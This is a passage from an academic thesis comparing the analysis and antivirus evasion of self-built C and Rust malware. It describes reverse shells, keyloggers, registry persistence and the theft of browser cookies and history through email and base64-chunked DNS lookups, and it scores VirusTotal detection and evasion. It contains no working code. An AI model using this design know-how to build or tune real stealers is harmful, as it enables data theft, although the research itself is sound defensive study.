low-level, obfuscation had to be done on the high-level source code. These insights were used
during the experimental design phase of this thesis to test the ease of reverse engineering
binaries written in C and the Rust programming language using popular disassemblers and
decompilers.

3.4 SLR Observations


In this section, a comprehensive overview of the research landscape is provided by outlining
the research gaps and challenges observed after conducting the SLR.

3.4.1 Gaps in Current Research

The following three gaps were identified through the SLR:

1. Academic research on malware in the Rust programming language is sparse in
comparison to industrial and independent research publications.

2. Among independent researchers, the number of works on malware written in the
Rust programming language is lower than the number on other unconventional
programming languages like Go and Nim.

3. The industrial research works only share the results of their malware analysis and do
not provide information regarding the process of analyzing malware written in the
Rust programming language.

This thesis aims to serve as a starting point for exploring these areas, which have not been
adequately addressed in the existing literature, and to stimulate further research efforts in
them.

3.4.2 Challenges in Current Research

Upon exploring multiple malware repositories such as The Zoo [79] and VXUnderground
[80], it was found that source code for malware variants written in the Rust programming
language is not available. Hence, sourcing real-world malware written in this language
for academic or individual research is a challenge that is probably hindering the research
output in this area.

It was observed that most industrial researchers had access to the malware binary or source
code through the deployment of their Endpoint Detection and Response (EDR) and antivirus
(AV) tools. However, most of the individual researchers had to resort to writing simple
malware samples by themselves.

This thesis expands on the approach used by individual researchers by developing program
samples that simulate the behavior of different categories of malware. The experimental
design of this thesis is explained in further detail in the next chapter.

4 Methodology
This chapter provides a detailed description of the methodology used to conduct experiments
and to collect and analyze data for this thesis. It explains the research design, the research
questions that will be answered, the hypotheses formulated, the experimental setup and the
metrics used to compare malware written in the C and the Rust programming languages.

4.1 Experimental Design


A cause-effect experimental design is a form of quantitative research that involves
manipulating independent variables (cause) and measuring their effect on dependent variables
(effect) in a controlled environment. The hypotheses are tested to answer the research
questions listed in Chapter 1 using two experiments. Table 3 lists the software and their
versions used to conduct the experiments.

Table 3. List of software used for the experiments.

Software Version
Oracle VM Virtual Box 7.0.6
Windows Operating System Windows 10 Enterprise Edition
Ghidra 10.1.3
IDA Free 8.2
MinGW 10.0.0
MSVC 143
Windows 10 SDK 10.0.22000.0
Rust 1.68.2
GNU Strings 2.3
VirusTotal (free) Web Interface API v3

4.1.1 Programs Developed for Static and Dynamic Analysis

To compare the ease of static and dynamic analysis, 40 malware samples were developed in
the C and Rust programming languages for the Windows operating system. Figure 2 shows
the 6 categories and 20 sub-categories of malware developed based on different behaviors.
The signatures for these sub-categories of malware are provided in Appendix A, and their
pseudocode is provided in Appendix B.

Figure 2. Categories of malware developed and tested.

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a publicly
accessible knowledge base describing different cyberattacks [81]. The behaviors of these
malware samples have been mapped to MITRE ATT&CK Techniques in Table 4.

Table 4. Mapping of the sub-categories of malware to MITRE ATT&CK Techniques.

Sub-category of malware                          MITRE ATT&CK Techniques
Delete files                                     T1485 Data Destruction
                                                 T1070 Indicator Removal
Encrypt files                                    T1486 Data Encrypted for Impact
Create files                                     T1565 Data Manipulation
Modify file                                      T1565.001 Data Manipulation: Stored Data Manipulation
Simple reverse shell                             T1059 Command and Scripting Interpreter
Simple bind shell                                T1059 Command and Scripting Interpreter
Obfuscated reverse shell                         T1059 Command and Scripting Interpreter
                                                 T1027 Obfuscated Files or Information
Obfuscated bind shell                            T1059 Command and Scripting Interpreter
                                                 T1027 Obfuscated Files or Information
Hosts file exfiltration using email              T1114 Email Collection
                                                 T1020 Automated Exfiltration
Edge browser history exfiltration using email    T1114 Email Collection
                                                 T1020 Automated Exfiltration
Edge browser cookies exfiltration using email    T1114 Email Collection
                                                 T1020 Automated Exfiltration
Hosts file exfiltration using DNS                T1020 Automated Exfiltration
                                                 T1027 Obfuscated Files or Information
                                                 T1071.004 Application Layer Protocol: DNS
Edge browser history exfiltration using DNS      T1020 Automated Exfiltration
                                                 T1027 Obfuscated Files or Information
                                                 T1071.004 Application Layer Protocol: DNS
Edge browser cookies exfiltration using DNS      T1020 Automated Exfiltration
                                                 T1027 Obfuscated Files or Information
                                                 T1071.004 Application Layer Protocol: DNS
Delete registry key                              T1112 Modify Registry
Modify registry key                              T1112 Modify Registry
Add registry key                                 T1112 Modify Registry
                                                 T1547.001 Boot or Logon Autostart Execution: Registry Run Keys
Simple keylogger                                 T1056.001 Input Capture: Keylogging
Keylogger that sends file with data via DNS      T1056.001 Input Capture: Keylogging
                                                 T1020 Automated Exfiltration
                                                 T1027 Obfuscated Files or Information
                                                 T1071.004 Application Layer Protocol: DNS
Keylogger that sends file with data via email    T1056.001 Input Capture: Keylogging
                                                 T1114 Email Collection
                                                 T1020 Automated Exfiltration

1. File manipulator: This category of malware creates, modifies or deletes files on a
victim's computer system to disrupt normal operations or cover up the attackers’
tracks [82], [83], [84]. The types of malware developed in this category are:

i. Create File: A malware that creates files in a specified directory.

ii. Delete File: A malware that deletes all the files in a specified directory.

iii. Encrypt File: A malware that encrypts all the files in a specified directory.

iv. Modify File: A malware that modifies the entries in the “C:\Windows\System32\
Drivers\etc\hosts” file.

2. Command shells: This category of malware allows attackers to control the victim's
machine and execute commands on it. A reverse shell is a type of malware that
provides attackers with remote access to a victim's computer system [85]. A bind shell
is a type of malware that starts a listener on a victim's computer system to accept
connections from the attackers [86]. The types of malware developed in this category
are:

i. A simple reverse shell: A malware that connects to the attacker and starts
“cmd.exe”.

ii. A simple bind shell: A malware that opens a listener for an attacker to connect and
start “cmd.exe”.

iii. An obfuscated reverse shell: A reverse shell which uses XOR encryption to
obfuscate strings in its source code.

iv. An obfuscated bind shell: A bind shell which uses XOR encryption to obfuscate
strings in its source code.

3. Information stealer: This category of malware is designed to steal sensitive
information from a victim's computer system. This can include passwords, financial
data, and sensitive files [87], [88], [89]. The types of malware developed in this
category are:

i. Hosts file exfiltration using email: A malware that sends the “C:\Windows\
System32\Drivers\etc\hosts” file as a mail attachment to the attacker.

ii. Edge browser history exfiltration using email: A malware that sends the
“%LOCALAPPDATA%\Microsoft Edge\User Data\Default\History” file as a mail
attachment to the attacker.

iii. Edge browser cookies exfiltration using email: A malware that sends the
“%LOCALAPPDATA%\Microsoft Edge\User Data\Default\Cookies” file as a
mail attachment to the attacker.

4. Covert information stealer: This category of malware is similar to information
stealers. However, it avoids detection by using techniques like encryption, encoding
and disguising its activity as legitimate network traffic [90], [91], [92]. The
types of malware developed in this category are:

i. Hosts file exfiltration using DNS lookup: A sophisticated malware that base64
encodes the contents of the “C:\Windows\System32\Drivers\etc\hosts” file in
chunks of 5 bytes, and performs an nslookup of this encoded string to a rogue
DNS server. The rogue DNS server upon receiving this lookup request, can put
together the base64 decoded strings to get the contents of the file.

ii. Edge browser history exfiltration using DNS lookup: A sophisticated malware
that base64 encodes the contents of the “%LOCALAPPDATA%\Microsoft Edge\
User Data\Default\History” file in chunks of 5 bytes, and performs an nslookup of
this encoded string to a rogue DNS server. The rogue DNS server upon receiving
this lookup request, can put together the base64 decoded strings to get the contents
of the file.

iii. Edge browser cookies exfiltration using DNS lookup: A sophisticated malware
that base64 encodes the contents of the “%LOCALAPPDATA%\Microsoft Edge\
User Data\Default\Cookies” file in chunks of 5 bytes, and performs an nslookup
of this encoded string to a rogue DNS server. The rogue DNS server upon
receiving this lookup request, can put together the base64 decoded strings to get
the contents of the file.

5. Registry manipulator: This category of malware modifies, deletes or adds Windows
registry keys for persistence, evasion or disruption of activities [93], [94], [95]. The
types of malware developed in this category are:

i. Add registry key: This malware adds itself to the “HKEY_CURRENT_USER\
Software\Microsoft\Windows\CurrentVersion\Run” registry key as a persistence
mechanism so that it runs automatically at every reboot.

ii. Modify registry key: This malware modifies the default value of the autorun
registry entry of the OneDrive program “HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Run\OneDrive” to an invalid value of 0. This
prevents OneDrive from automatically running at every reboot.

iii. Delete registry key: This malware deletes the default autorun registry entry of the
OneDrive program “HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run\OneDrive”. This also prevents OneDrive from automatically
running at every reboot.

6. Keylogger: This category of malware records every keystroke on a computer. This is
done to collect sensitive information like passwords, credit card numbers, and other
personal data [96], [97], [98]. The types of malware developed in this category are:

i. A simple keylogger: This malware records all the keystrokes and logs them to the
“C:\Users\Public\key.log” file.

ii. A keylogger that sends the log file using email: This malware records all the
keystrokes, logs them to “C:\Users\Public\keyem.log” and then sends this log file
to the attacker as an email attachment.

iii. A keylogger that sends the log file using DNS lookup: This malware records all
the keystrokes and logs them to “C:\Users\Public\keydns.log”. It then base64 encodes
the contents of the log file in chunks of 5 bytes, and performs an nslookup of this
encoded string to a rogue DNS server. Upon receiving this lookup request, the rogue
DNS server can put together the base64 decoded strings to get the contents of the file.

4.1.2 Program Developed for Code Analysis

In addition to the 40 samples of malware developed above, an access-checking program was
developed to test the ability of Ghidra and IDA Free to decompile and disassemble,
respectively, binaries written in the Rust programming language.

As shown in Figure 3, the access-checking program was developed in such a way that it has
function calls, function return values, conditional checks based on return values and nested
conditional checks. This was done to establish a baseline when testing the ease of analyzing
different control flows using Ghidra and IDA Free.

Figure 3. Control flow of the access-checking program used for code analysis.

4.2 Experiment 1: Comparing the Ease of Malware Analysis and Reverse
Engineering
Manual and automated static and dynamic analysis were performed on the 40 samples
developed. Manual analysis was performed using the tools from the REMnux toolkit [99],
and automated analysis was performed using VirusTotal [100], [101].

The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge)
Techniques and Tactics mapped to the behavior of the malware by VirusTotal were of
particular interest in this experiment. For each sample tested, VirusTotal conducts dynamic
analysis in one of its sandboxes and provides a list of ATT&CK Techniques and Tactics,
along with a severity rating for each of these mappings: “unknown”, “info”, “low”,
“medium” or “high” [102].

Since the behavior of the developed samples is already known, we analyzed the list of
MITRE ATT&CK Techniques and Tactics listed by VirusTotal to identify False Positives (FP)
and False Negatives (FN). Five metrics were collected and compared during the manual and
automated static and dynamic analysis. In this thesis, we have interpreted the relationship
between these metrics and the ease of analysis and reverse engineering in the following way:

1. Size of the binaries: The size of the malware binary is considered inversely
proportional to the ease of analysis. This is because, in general, it was observed that
the speed with which a binary can be disassembled, decompiled and analyzed
decreases with the increase in its size.

2. Strings that can be used to identify the source language and the author: The number of
identifiable strings in the malware binary is considered directly proportional to the
ease of analysis. This is because the more identifiable strings are found, the more
easily the source language and information about the threat actor can be
identified.

3. The number of “non-info” MITRE ATT&CK Techniques and Tactics identified in
VirusTotal: The number of “non-info” findings, i.e., findings rated “unknown” or “info”,
is considered inversely proportional to the ease of analysis. This is because these
findings do not provide clear and definite information about the intent and key
behaviors of the malware.

4. The percentage of False Positive (FP) MITRE ATT&CK Techniques and Tactics
identified in VirusTotal: The FP% is considered inversely proportional to the ease of
analysis of the malware. This is because the higher the FP%, the more records an
analyst has to manually retest, making the analysis process harder. The
FP% is calculated as shown below [103]:
FP % = (FP / Total) * 100 (1)

5. The percentage of False Negative (FN) MITRE ATT&CK Techniques and Tactics
identified in VirusTotal: The FN% is considered inversely proportional to the ease of
analysis of the malware. This is because the higher the FN%, the more records an
analyst has to manually retest to discover malicious behavior that went
unreported. This makes the analysis process harder; moreover, FNs are more dangerous
than FPs [104]. The FN% is calculated as shown below:
FN % = (FN / Total) * 100 (2)
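
As an illustration of metrics 3 to 5, the following Python sketch compares the Techniques a sample is known to implement against those reported by a sandbox and applies Equations (1) and (2). It is a sketch under stated assumptions: the Technique sets and severity ratings are made-up example data, the names are hypothetical, and Total is taken here to be the number of distinct Techniques that are either expected or reported, which is one possible reading of the equations.

```python
def percentage(count: int, total: int) -> float:
    """Equations (1) and (2): (count / total) * 100."""
    if total <= 0:
        raise ValueError("total must be positive")
    return (count / total) * 100


# Hypothetical example data for a single sample.
expected = {"T1485", "T1070"}            # behaviors the sample is known to implement
reported = {"T1485", "T1027", "T1082"}   # Techniques listed by the sandbox
ratings = {"T1485": "high", "T1027": "info", "T1082": "unknown"}

false_positives = reported - expected    # reported but not implemented
false_negatives = expected - reported    # implemented but not reported

# Assumption: Total counts every distinct Technique, expected or reported.
total = len(expected | reported)

fp_percent = percentage(len(false_positives), total)
fn_percent = percentage(len(false_negatives), total)

# Metric 3: findings rated "unknown" or "info".
non_info = sum(1 for rating in ratings.values() if rating in ("unknown", "info"))

print(sorted(false_positives), fp_percent)
print(sorted(false_negatives), fn_percent)
print(non_info)
```

With this example data, two of the four distinct Techniques are false positives and one is a false negative, so the sketch yields an FP% of 50 and an FN% of 25, with two “non-info” findings.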

The access-checking programs written in the C and Rust programming languages were
analyzed in Ghidra and IDA Free to collect and compare the following metrics:

1. Ease of identifying the main function from the decompiled/disassembled output.

2. Ease of identifying other program functions from the decompiled/disassembled
output.

3. Ease of understanding program flow from the decompiled/disassembled output.

Table 5 summarizes the cause-effect design of Experiment 1.

Table 5. The cause-effect design of Experiment 1.

Variable Type          Variable
Independent (Cause)    Compiler/Programming language
Dependent (Effect)     Ease of analysis and reverse engineering

4.3 Experiment 2: Comparing the Effectiveness of Antivirus Evasion
VirusTotal is a free service owned by Google that inspects files and URLs for malware [100].
As of 2023, a given sample is tested by 70 antivirus vendors known as Contributors [101].
The 40 samples of the malware developed in the C and Rust programming languages were
submitted for analysis to VirusTotal. In this thesis, we have assigned weights to the results of
VirusTotal to calculate the percentage of antivirus evasion. These weights are determined as
follows:

1. Undetected: Results labeled as “Undetected” are considered benign, i.e., not
malware. To measure antivirus evasion, these results are given a weight of 1.

2. Malware: Results labeled as “malicious”, “malware”, “trojan”, and other similar
labels that indicate moderate to high confidence are considered as malware. To
measure antivirus evasion, these results are given a weight of 0.

3. Grayware: Results labeled as “grayware” or “low confidence” are considered as
software that may or may not be malware. To measure antivirus evasion, these
results are given a weight of 0.5.

Based on this interpretation, we calculate the percentage of antivirus evasion as follows:

Evasion% = ( ((Undetected * 1) + (Malware * 0) + (Grayware * 0.5)) / 70 ) * 100
=> Evasion% = ( (Undetected + (Grayware * 0.5)) / 70 ) * 100 (3)

where Undetected, Malware and Grayware are the numbers of results in each category; 1, 0 and
0.5 are the respective weights of the results; and 70 is the total number of antivirus results.
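
Equation (3) can be checked with a short Python sketch. The function name evasion_percent and the example counts are hypothetical; the weights and the fixed total of 70 results are taken from the description above.

```python
# Weights from the text: undetected = 1, malware = 0, grayware = 0.5.
WEIGHTS = {"undetected": 1.0, "malware": 0.0, "grayware": 0.5}


def evasion_percent(undetected: int, malware: int, grayware: int, total: int = 70) -> float:
    """Equation (3): weighted share of results that did not flag the sample."""
    score = (
        undetected * WEIGHTS["undetected"]
        + malware * WEIGHTS["malware"]
        + grayware * WEIGHTS["grayware"]
    )
    return (score / total) * 100


# Hypothetical result counts for one sample (they add up to 70).
example = evasion_percent(undetected=50, malware=15, grayware=5)
print(example)
```

For these example counts the weighted score is 50 + 2.5 = 52.5, which gives an evasion of 75% over 70 results. A sample detected by every vendor scores 0%, and one detected by none scores 100%.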

The evasion percentages of the samples written in C and the Rust programming language
are compared to determine which samples have better evasion. Table 6 summarizes the
cause-effect design of Experiment 2.

Table 6. The cause-effect design of Experiment 2.

Variable Type          Variable
Independent (Cause)    Compiler/Programming language
Dependent (Effect)     Effectiveness of antivirus evasion (evasion%)

5 Results
This chapter presents the raw data collected, the calculations used, and the observations of the
experiments conducted. These results and observations are then discussed in further detail in
the next chapter.

5.1 Results of Experiment 1


This section presents the results of Experiment 1, which compares the ease of analysis and
reverse engineering of malware written in the C and Rust programming languages. It evaluates
the hypothesis H1 and answers the research questions RQ1 and RQ2.

5.1.1 Size of the Binaries

During static analysis of the 40 malware samples, the sizes of their binaries were recorded.
Table 7 provides a comparison of the sizes of the binaries, in kilobytes (KB), of the malware
samples written in the C and Rust programming languages.

Table 7. Comparison of the size of malware binaries.

Sub-category of Malware                        Size of the Binary (in KB)
                                               C         Rust
Delete files                                   118.89    1022.5
Encrypt files                                  119.23    1023
Create files                                   118.95    1020
Modify file                                    45.3      1021.5
Simple reverse shell                           83.50     1000
Simple bind shell                              110       269.50
Obfuscated reverse shell                       84        259.50
Obfuscated bind shell                          110       272
Hosts file exfiltration using email            127       1770
Edge browser history exfiltration using email  127       1770
Edge browser cookies exfiltration using email  127       1770
Hosts file exfiltration using DNS              46.28     1020
Edge browser history exfiltration using DNS    46.78     1020
Edge browser cookies exfiltration using DNS    46.78     1020
Delete registry key                            45.49     1010
Modify registry key                            45.49     1010
Add registry key                               45.5      1023
Simple keylogger                               119.5     259.50
Keylogger that sends file with data via DNS    129.5     350.50
Keylogger that sends file with data via email  131.50    785.50

It is observed that the binaries of all malware written in the Rust programming language are
significantly larger than their C counterparts. Since a larger binary contains more code for
the analyst and the tools to process, this suggests that analysis, disassembly and
decompilation of malware written in the Rust programming language is more difficult and
time-consuming.
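
To put the difference in perspective, the size ratio of each Rust binary to its C counterpart can be computed from Table 7. The following is a minimal sketch; the dictionary layout and the function name are assumptions made for illustration, while the sizes are copied from Table 7.

```python
# (C size in KB, Rust size in KB) per sample, copied from Table 7.
SIZES_KB = {
    "Delete files": (118.89, 1022.5),
    "Encrypt files": (119.23, 1023),
    "Create files": (118.95, 1020),
    "Modify file": (45.3, 1021.5),
    "Simple reverse shell": (83.50, 1000),
    "Simple bind shell": (110, 269.50),
    "Obfuscated reverse shell": (84, 259.50),
    "Obfuscated bind shell": (110, 272),
    "Hosts file exfiltration using email": (127, 1770),
    "Edge browser history exfiltration using email": (127, 1770),
    "Edge browser cookies exfiltration using email": (127, 1770),
    "Hosts file exfiltration using DNS": (46.28, 1020),
    "Edge browser history exfiltration using DNS": (46.78, 1020),
    "Edge browser cookies exfiltration using DNS": (46.78, 1020),
    "Delete registry key": (45.49, 1010),
    "Modify registry key": (45.49, 1010),
    "Add registry key": (45.5, 1023),
    "Simple keylogger": (119.5, 259.50),
    "Keylogger that sends file with data via DNS": (129.5, 350.50),
    "Keylogger that sends file with data via email": (131.50, 785.50),
}


def size_ratios(sizes: dict) -> dict:
    """Return {sample: Rust size / C size} for every sample."""
    return {name: rust / c for name, (c, rust) in sizes.items()}


ratios = size_ratios(SIZES_KB)
smallest = min(ratios, key=ratios.get)
largest = max(ratios, key=ratios.get)
print(f"smallest ratio: {smallest} ({ratios[smallest]:.2f}x)")
print(f"largest ratio:  {largest} ({ratios[largest]:.2f}x)")
```

On the values of Table 7, the Rust binaries are between roughly 2.2 times (Simple keylogger) and roughly 22.5 times (Modify file) the size of their C counterparts.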

5.1.2 Identifiable String Patterns in the Binaries

The GNU strings utility was used to collect string patterns that could be used to identify the
source language and other details about the malware and its author. Table 8 lists the common
string patterns that were observed when analyzing the malware samples written in the C and
Rust programming languages.

Table 8. List of identifiable strings in the binary.

C Programming Language
  Source Language Info:
    MinGW specific strings:
      • Mingw
      • GCC
      • libgcc.c
    MSVC specific strings:
      • WS2_32.dll
  Other Info:
    • Source name is exposed when compiled with GCC/MinGW.
    • Email ids and SMTP server’s name for email-based stealer malware.
    • RogueDNS’ name for covert stealer malware.

Rust Programming Language
  Source Language Info:
    • .rs references
    • cargo
    • rustc
    • rust_panic
  Other Info:
    • Some binaries exposed the author’s home directory: C:\Users\m\.cargo.
    • Email ids and SMTP server’s name for email-based stealer malware.
    • RogueDNS’ name for covert stealer malware.

It is observed that identifiable strings were easier to find in malware written in the Rust
programming language than in their C counterparts. The string patterns in the C binaries varied
depending on the compiler used, i.e., MinGW or MSVC. Moreover, the Rust binaries exposed
the home directory of the system on which they were compiled, as shown in Figure 4. Such an
exposure could potentially reveal the identity of a careless attacker. This indicates that
identifying information about malware using string analysis is easier for samples written in
the Rust programming language than for those written in the C programming language.

Figure 4. Exposed home directory in the embedded strings of the malware written in the Rust
programming language.
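
The string analysis described in this section can be approximated with a short script. The following is a minimal sketch and not the procedure used in this thesis: the marker patterns are derived from Table 8, while the function names, the dictionary keys and the word-boundary rule for “.rs” (added so that the common PE section name “.rsrc” is not counted) are assumptions introduced here.

```python
import re

# Marker patterns derived from Table 8. The grouping into two labels is an
# illustrative choice, not part of the thesis.
MARKERS = {
    "rust": re.compile(rb"\.cargo|rustc|rust_panic|\.rs\b", re.IGNORECASE),
    "c_mingw": re.compile(rb"mingw|libgcc|gcc", re.IGNORECASE),
}


def printable_strings(data: bytes, min_len: int = 4):
    """Yield runs of printable ASCII, similar to the GNU strings utility."""
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield match.group()


def find_language_markers(data: bytes) -> dict:
    """Map each label to the embedded strings that contain one of its markers."""
    hits = {label: [] for label in MARKERS}
    for text in printable_strings(data):
        for label, pattern in MARKERS.items():
            if pattern.search(text):
                hits[label].append(text.decode("ascii"))
    return hits


# Synthetic bytes standing in for a binary. A real sample would be read with
# open(path, "rb").read().
sample = b"\x00\x01C:\\Users\\m\\.cargo\\registry\\src\\lib.rs\x00.rsrc\x00rust_panic\x00ab\x00"
print(find_language_markers(sample))
```

A match only suggests the toolchain. Marker strings can be absent from some binaries or present for unrelated reasons, so the result should be treated as a hint for tool selection and not as proof of the source language.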

5.1.3 False Positive and False Negative MITRE ATT&CK findings

The False Positive (FP) and False Negative (FN) MITRE ATT&CK findings reported by
VirusTotal for the malware samples were counted, and their percentages were calculated using
Equations 1 and 2 described in Section 4.2. The raw data for this calculation is provided in
Table 9 for malware in the C programming language, and Table 10 for malware in the Rust
programming language. The final results of the comparison are provided in Table 11.

Table 9. Calculation of FP% and FN% MITRE ATT&CK findings for malware in the C programming
language.
C Programming Language
                                                                     False Positives  False Negatives
Sub-category of Malware                        Total  Info  Non-Info  FP #  FP %   FN #  FN %   TT
Delete files                                   9      9     0         4     44.44  0     0
Encrypt files                                  9      9     0         4     44.44  0     0
Create files                                   7      7     0         2     28.57  0     0
Modify file                                    6      5     1         1     20     0     0
Simple reverse shell                           5      5     0         3     60     0     0
Simple bind shell                              9      8     1         7     87.5   0     0
Obfuscated reverse shell                       8      8     0         5     62.5   0     0
Obfuscated bind shell                          8      8     0         5     62.5   0     0
Hosts file exfiltration using email            7      7     0         0     0      0     0
Edge browser history exfiltration using email  7      7     0         0     0      0     0
Edge browser cookies exfiltration using email  7      7     0         0     0      0     0
Hosts file exfiltration using DNS              11     10    1         1     10     0     0
Edge browser history exfiltration using DNS    10     9     1         1     11.11  0     0
Edge browser cookies exfiltration using DNS    12     11    1         1     9.09   0     0
Delete registry key                            7      7     0         3     42.85  0     0
Modify registry key                            12     10    2         4     40     0     0
Add registry key                               8      8     0         1     12.5   0     0
Simple keylogger                               15     15    0         6     40     0     0
Keylogger that sends file with data via DNS    16     16    0         7     43.75  2     12.5   T1056*, T1016**
Keylogger that sends file with data via email  15     15    0         6     40     1     6.66   T1056*
Cumulative Total →                                          7               32.96        0.95
*T1056: Input Capture - Creates a DirectInput object (often for capturing keystrokes).
**T1016: System Network Configuration Discovery - Uses nslookup.exe to query domains.

Table 10. Calculation of FP% and FN% MITRE ATT&CK findings for malware in the Rust
programming language.
Rust Programming Language
                                                                     False Positives  False Negatives
Sub-category of Malware                        Total  Info  Non-Info  FP #  FP %   FN #  FN %   TT
Delete files                                   18     18    0         11    61.1   0     0
Encrypt files                                  18     18    0         11    61.1   0     0
Create files                                   19     19    0         11    57.89  0     0
Modify file                                    20     18    2         10    55.55  0     0
Simple reverse shell                           20     20    0         13    65     0     0
Simple bind shell                              11     11    0         8     72.72  0     0
Obfuscated reverse shell                       12     12    0         8     66.66  0     0
Obfuscated bind shell                          11     11    0         7     63.63  0     0
Hosts file exfiltration using email            33     33    0         20    60.60  0     0
Edge browser history exfiltration using email  33     33    0         20    60.60  0     0
Edge browser cookies exfiltration using email  33     33    0         20    60.60  0     0
Hosts file exfiltration using DNS              22     22    0         12    54.54  0     0
Edge browser history exfiltration using DNS    22     22    0         12    54.54  0     0
Edge browser cookies exfiltration using DNS    22     22    0         12    54.54  0     0
Delete registry key                            23     23    0         11    47.82  0     0
Modify registry key                            26     24    2         11    45.83  0     0
Add registry key                               22     22    0         11    50     0     0
Simple keylogger                               15     15    0         8     53.33  1     6.66   T1056*
Keylogger that sends file with data via DNS    18     18    0         11    61.11  2     11.11  T1056*, T1016**
Keylogger that sends file with data via email  22     22    0         12    54.54  1     4.54   T1056*
Cumulative Total →                                          4               58.09        1.11
*T1056: Input Capture - Creates a DirectInput object (often for capturing keystrokes).
**T1016: System Network Configuration Discovery - Uses nslookup.exe to query domains.

Table 11. Results of comparison of the FP% and FN% of malware written in the C and Rust
programming languages.

Results of Comparison        Number of “non-info” findings   False Positive %   False Negative %
C Programming Language       7                               32.96              0.95
Rust Programming Language    4                               58.09              1.11

As observed in Table 11, the number of “non-info” MITRE ATT&CK findings is lower for
malware written in the Rust programming language than for their C counterparts. Among the
“info” MITRE ATT&CK findings, malware written in the Rust programming language had a
higher percentage of False Positives than their C counterparts (58.09% compared to 32.96%).
The same trend, although much smaller, was observed for the False Negatives (1.11% compared
to 0.95%). This indicates that the results of automated dynamic analysis of malware written
in the Rust programming language are less useful for analysts because they have to retest the
malware manually.
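
The cumulative FP% values can be cross-checked with a few lines of Python. This is a minimal sketch that assumes, based on the rows of Tables 9 and 10, that each FP% is the number of False Positives divided by the number of “info” findings, and that the cumulative value is the mean of the per-sample percentages. The authoritative definitions are Equations 1 and 2 in Section 4.2; the function and variable names are hypothetical.

```python
# (info findings, false positives) per sample, in the row order of Table 9 (C)
# and Table 10 (Rust).
C_ROWS = [(9, 4), (9, 4), (7, 2), (5, 1), (5, 3), (8, 7), (8, 5), (8, 5),
          (7, 0), (7, 0), (7, 0), (10, 1), (9, 1), (11, 1), (7, 3), (10, 4),
          (8, 1), (15, 6), (16, 7), (15, 6)]
RUST_ROWS = [(18, 11), (18, 11), (19, 11), (18, 10), (20, 13), (11, 8), (12, 8),
             (11, 7), (33, 20), (33, 20), (33, 20), (22, 12), (22, 12), (22, 12),
             (23, 11), (24, 11), (22, 11), (15, 8), (18, 11), (22, 12)]


def percent_of_info(count: int, info: int) -> float:
    """Share of the 'info' findings, in percent (assumed denominator)."""
    return count / info * 100 if info else 0.0


def mean_fp_percent(rows) -> float:
    """Mean of the per-sample FP% values."""
    values = [percent_of_info(fp, info) for info, fp in rows]
    return sum(values) / len(values)


print(f"C:    {mean_fp_percent(C_ROWS):.2f}")
print(f"Rust: {mean_fp_percent(RUST_ROWS):.2f}")
```

Under these assumptions the script reproduces the cumulative FP% values of Table 11 to within rounding.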

5.1.4 Reverse Engineering using Ghidra

Reverse engineering the access-checking program written in the C programming language
was simple. A symbol tree is a representation of the binary's internal structure showing how
functions, variables, and other program elements are connected. As shown in Figure 5, the
symbol tree of the C program was clearly displayed in Ghidra.

Figure 5. Symbol tree of the program written in the C programming language in Ghidra.

The “main” function and the “is_valid” function were decompiled in an understandable
format as shown in Figures 6 and 7.

Figure 6. Decompiled “main” function of the program written in the C programming language in
Ghidra. Annotation in the figure: calling is_valid() from main().

Figure 7. Decompiled "is_valid" function of the program written in the C programming language in
Ghidra. Annotations in the figure: checking if the string length = 10; checking if the 5th
character is ‘@’.

However, reverse engineering the access-checking program written in the Rust programming
language was difficult. The function names were not displayed in the symbol tree. Hence, the
Search Program Text feature had to be used to search for the “Access Denied” string, as shown
in Figure 8, to identify the namespace in the program that could lead to the main function.

Figure 8. Searching for the "Access Denied" text in the program written in the Rust programming
language in Ghidra.

It is observed that the function names are mangled. As shown in Figure 9, the “main”
function was in the FUN_00108b30 namespace.

Figure 9. Decompiled "main" function of the program written in the Rust programming language in
Ghidra. Annotation in the figure: namespace with the “main” function.

Although the function was decompiled, it was difficult to understand because it was
decompiled in the format of a C program. Moreover, the decompiled “main” function had
additional checks that were not part of the original source code as shown in Figure 10.

Figure 10. Additional code observed in the program written in the Rust programming language in
Ghidra. Annotation in the figure: additional code found, which was not part of the original
source code.

It is also observed that the “main” function contained the checks from the “is_valid”
function, which indicates that the two functions are merged in the FUN_00108b30 namespace
as shown in Figure 11. The reason for this is discussed in Chapter 6.

Figure 11. Combined code found in the decompiled program written in the Rust programming language
in Ghidra. Annotation in the figure: conditional check from “is_valid” within “main”.

5.1.5 Reverse Engineering using IDA Free

It is observed that IDA Free was able to disassemble the program written in the C programming
language and generate a flow graph, as shown in Figures 12 and 13. However, IDA Free did not
properly disassemble the program written in the Rust programming language and did not
generate a flow graph, as shown in Figure 14.

Figure 12. Disassembled flow of the "main" function of the program written in the C programming
language in IDA Free. Annotation in the figure: calling “is_valid” from “main”.

Figure 13. Disassembled flow of the "is_valid" function of the program written in the C programming
language in IDA Free. Annotations in the figure: checking if the string length = 10; checking if
the 5th character is ‘@’.

Figure 14. Disassembled flow of the program written in the Rust programming language in IDA Free.

5.1.6 Summary of Results of Experiment 1

To summarize, the results support the first hypothesis H1. Answering the research
questions RQ1 and RQ2, malware written in the Rust programming language is more
difficult to analyze and reverse engineer than malware written in C due to the following factors:

1. The binaries of malware written in the Rust programming language are significantly
   larger than those written in the C programming language.

2. The percentage of False Positives (FP) produced by an automated analysis tool is greater
   for malware written in the Rust programming language.

3. The percentage of False Negatives (FN) produced by an automated analysis tool is
   greater for malware written in the Rust programming language.

4. IDA Free fails to disassemble and generate a flow graph for the malware binary
   written in the Rust programming language.

5. Although Ghidra decompiles the malware binary written in the Rust programming
   language, it does so in the format of a C program. Moreover, the decompiled code
   contains additional checks added by the rustc compiler, and all the function names
   are mangled by the rustc compiler. This makes the decompiled code difficult to
   interpret even though it is in a high-level language format.

5.2 Results of Experiment 2


This section presents the results of Experiment 2, which compares the effectiveness of
evading antivirus detection by malware written in the C and Rust programming languages. It
evaluates the hypothesis H2 and answers the research questions RQ1 and RQ2.

The raw data containing the detection rates of each sample on VirusTotal is provided in Table
12 and Table 13 for malware written in the C and Rust programming languages respectively.
Equation 3 described in Section 4.3 was used to calculate the antivirus evasion percentage
using this raw data.

Table 12. Calculation of the evasion% of malware written in the C programming language.
Sub-category of Malware in the
C Programming Language                         Undetected (1)  Malware (0)  Grayware (0.5)  Evasion %
Delete files                                   69              1            0               98.57
